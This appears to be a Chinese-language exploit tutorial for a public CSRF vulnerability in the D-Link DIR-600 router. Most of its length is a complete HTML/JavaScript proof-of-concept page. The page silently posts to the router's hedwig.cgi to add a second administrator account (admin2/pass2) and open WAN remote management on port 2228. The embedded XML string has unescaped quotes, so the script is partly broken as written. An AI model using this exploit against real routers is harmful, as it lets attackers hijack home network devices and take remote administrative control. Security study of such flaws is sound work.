D-link路由器CSRF漏洞利用详解
1,介绍 本文的目的是展示CSRF漏洞的危害,以D-link的DIR-600路由器(硬件版本:BX,固件版本:2.16)的CSRF漏洞为例。 D-link的CSRF漏洞已经是公开的,本文将详细描述一下整个D-link CSRF漏洞的利用,如何通过CSRF漏洞实现远程管理访问D-link路由器。 2,CSRF漏洞说明 如果某些request请求中没有csrf token或不需要密码授权,会存在CSRF漏洞,该漏洞允许攻击者伪造登录用户发送请求,因此可以导致用户执行攻击者想要的操作请求。 通过D-link 管理面板的CSRF漏洞,攻击者可以做以下操作: @1,添加一个新的管理帐号; @2,启用路由器的远程管理; @3,ping特定的机器;此操作只需要登录路由器可以实现,需要知道路由器的WAN IP地址。 3,PART1:给路由器增加一个新的管理帐号 需要两个request请求来完成 REQUEST1: <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://192.168.0.1/hedwig.cgi", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "text/plain; charset=UTF-8"); xhr.withCredentials = "true"; var body = "<?xml version="1.0" encoding="UTF-8" ?>"+ " <postxml>"+ "<module>"+ "<service>DEVICE.ACCOUNT</service>"+ "<device>"+ "<account>"+ "<seqno/>"+ "<max>1</max>"+ "<count>2</count>"+ "<entry>"+ "<name>admin</name>"+ " <password>==OoXxGgYy==</password>"+ "<group>0</group>"+ "<description/>"+ "</entry>"+ "<entry>"+ "<name>admin2</name>"+ " <password>pass2</password>"+ "<group>0</group>"+ "<description/>"+ "</entry>"+ "</account>"+ "<session>"+ "<captcha>0</captcha>"+ "<dummy/>"+ "<timeout>180</timeout>"+ "<maxsession>128</maxsession>"+ "<maxauthorized>16</maxauthorized>"+ "</session>"+ "</device>"+ "</module>"+ "<module>"+ "<service>HTTP.WAN-1</service>"+ "<inf>"+ "<web>2228</web>"+ "<weballow>"+ "<hostv4ip/>"+ "</weballow>"+ "</inf>"+ "</module>"+ "<module>"+ "<service>HTTP.WAN-2</service>"+ "<inf>"+ "<web>2228</web>"+ "<weballow>"+ "<hostv4ip/>"+ "</weballow>"+ "</inf>"+ "</module>"+ "</postxml>"; xhr.send(body); } </script> <form action="#"> <input type="button" value="Submit request1" onclick="submitRequest();" /> </form> </body> </html>
